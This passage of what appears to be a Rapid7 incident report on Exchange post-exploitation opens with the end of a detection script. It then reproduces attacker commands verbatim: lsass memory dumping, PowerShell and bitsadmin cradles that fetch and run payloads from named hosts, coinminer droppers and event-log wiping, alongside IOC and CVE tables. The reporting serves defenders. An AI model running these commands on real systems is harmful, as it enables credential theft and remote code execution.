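]

if __name__ == "__main__":
    for event_id, hits in run_detections(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

The environment-variable check is deliberately independent of the command-line checks: event 5 shows a plain `cmd.exe /c whoami` under the OWA worker still alerting, which is the point of the APP_POOL_ID detection, while the last assertion-style case (procdump against lsass launched outside any webshell) shows the credential-dump rule firing on its own.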
\n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables the attacker to return to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. 
This makes it easy for attackers to guess future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcdump64.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. 
The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nRemoval of the Administrator account from the Exchange Organization administrators group in Active Directory using the net.exe command, executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping 
-n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * 
[T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * [T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * 
[T1505](<https://attack.mitre.org/techniques/T1505/>) \\- Server Software Component\n * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) \\- Server Software Component: Web Shell\n * [T1518](<https://attack.mitre.org/techniques/T1518>) \\- Software Discovery\n * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) \\- Software Discovery: Security Software Discovery\n * [T1531](<https://attack.mitre.org/techniques/T1531>) \\- Account Access Removal\n * [T1583](<https://attack.mitre.org/techniques/T1583>) \\- Acquire Infrastructure\n * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) \\- Acquire Infrastructure: Virtual Private Server\n * [T1587](<https://attack.mitre.org/techniques/T1587>) \\- Develop Capabilities\n * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) \\- Develop Capabilities: Malware\n * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) \\- Develop Capabilities: Exploits\n * [T1588](<https://attack.mitre.org/techniques/T1588>) \\- Obtain Capabilities\n * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) \\- Obtain Capabilities: Malware\n * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) \\- Obtain Capabilities: Tool\n * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) \\- Obtain Capabilities: Exploits\n * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) \\- Obtain Capabilities: Vulnerabilities\n * [T1595](<https://attack.mitre.org/techniques/T1595>) \\- Active Scanning\n * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) \\- Active Scanning: Scanning IP Blocks\n * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) \\- Active Scanning: Vulnerability Scanning\n\n## Non-HAFNIUM-related activity\n\nRapid7 has also observed several additional distinct types of post-exploitation activity following exploitation of these Exchange vulnerabilities in recent weeks by attackers other than HAFNIUM. 
We have grouped these and distilled the unique types of commands being executed into the individual sections shown below.\n\n### Minidump and Makecab attacker\n\nThis attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952\\(v=ws.11\\)>) to enumerate all users from the Active Directory domain. The attacker would also use the [Minidump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then used the existing Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, the data this attacker targeted for collection from victims has some similarities to that discussed in other reporting on the actor known as HAFNIUM. 
However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\n \n \n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n dsquery * -limit 0 -filter objectCategory=person -attr * -uco\n powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Minidump via COM Services DLL\n\n### Malicious DLL attacker\n\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>), in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. 
Additionally, this is a commonly employed action for an attacker to take post-compromise.\n \n \n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c net time /do\n net time /do\n c:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n c:\\windows\\system32\\cmd.exe /c klist\n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c netstat -ano\n netstat -ano\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Opera Browser and Cobalt Strike attacker\n\nThis attacker was seen using common techniques to download scripts with Microsoft\u2019s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. 
The eventual end of this execution would result in the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a favorite tool of attackers that distributes ransomware:\n \n \n C:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA\n msiexec.exe -k\n powershell Start-Sleep -Seconds 10\n cmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA\n \n\nBase64 decoded 
strings passed to PowerShell:\n \n \n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\opera\\opera_browser.png')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\opera\\opera_browser.dll')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\opera\\opera_browser.exe')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Download And Execute With Background Intelligent Transfer Service\n * Attacker Technique - URL Passed To BitsAdmin\n\n### Six-character webshell attacker\n\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\n \n \n cmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_6_CHARACTER_STRING>.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Encoded PowerShell download cradle attacker\n\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. 
They would also execute the [getmac.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/getmac>) utility to enumerate information about the network adapters.\n \n \n cmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcAAuAGUAcwB0AG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AGUAJwApAA==\n C:\\Windows\\system32\\getmac.exe /FO CSV\n \n\nBase64 decoded strings passed to PowerShell:\n \n \n IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - PowerShell Download Cradles\n\n### Ten-character webshell attacker\n\nThis attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be read-only recursively. Additionally, the attacker would use the attrib.exe utility to mark the file containing the webshell as hidden and system to make finding these more difficult.\n \n \n C:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\error.aspx\" \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\"\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n C:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program 
Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Modification Of Files In Exchange Webroot\n\n### 7zip and NetSupport Manager attacker\n\nThis attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:\n \n \n c:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\n c:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\n powershell C:\\Programdata\\script1.ps1\n C:\\ProgramData\\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramData\n ping -n 10 127.0.0.1\n c:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\n taskkill /Im rundll32.exe /F\n C:\\ProgramData\\NetConnections\\client32.exe\n ping -n 10 127.0.0.1\n taskkill /Im rundll32.exe /F\n c:\\windows\\system32\\cmd.exe /c tasklist /v\n tasklist /v\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Event log deletion and virtual directory creation attacker\n\nThis attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using 
[wevtutil.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):\n \n \n CMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /physicalPath:C:\\ProgramData\\COM\\zfwqn\n \n CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\n wevtutil el\n wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Clearing Event Logs With WEvtUtil\n\n### Webshell enumeration attacker\n\nThis attacker was seen executing encoded PowerShell commands to use the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command to view the contents of possible webshell files named outlooken.aspx, a name seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers, or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:\n \n \n cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA\n cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA\n \n\nBase64 decoded strings:\n \n \n type \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this 
attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Coinminer dropper attacker\n\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nAnd again, this time retrieving a slightly different filename from the same host:\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Simple reconnaissance attacker(s)\n\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\n \n \n net group /domain\n net group \"Domain Computers\" /do\n net group \"Domain Users\" /do\n net group IntranetAdmins /do\n net user /domain\n systeminfo\n tasklist\n \n\nAnother example where only simple recon-type commands were executed:\n \n \n whoami\n systeminfo\n systeminfo\n wmic product get name\n Wmic product get name\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n## Conclusions\n\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several 
different attackers with different motivations and skills. Rapid7 even observed exploitation of the same victim by multiple actors (HAFNIUM and coinminer droppers) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services for as long as the gathered credentials remain unchanged. \n\nThis dumping of credentials may have been done at this scale because the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM and the subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**\n\nContinuing to analyze the behavior of attackers post-compromise in order to develop detections greatly increases the likelihood of being notified of a breach, regardless of the method used to obtain initial access to the victim environment. 
Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.\n\n### Observed CVEs employed by attackers: \n\n\nCommon Vulnerabilities and Exposure | Description \n---|--- \nCVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html> \nCVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855> \nCVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857> \nCVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858> \nCVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \n \n### Observed IOCs employed by all attackers:\n\nType | Value \n---|--- \nFQDN | estonine.com \nFQDN | p.estonine.com \nFQDN | ipinfo.io \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\ \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\ \nFilepath | c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\ \nFilepath | C:\\Programdata\\ \nFilepath | 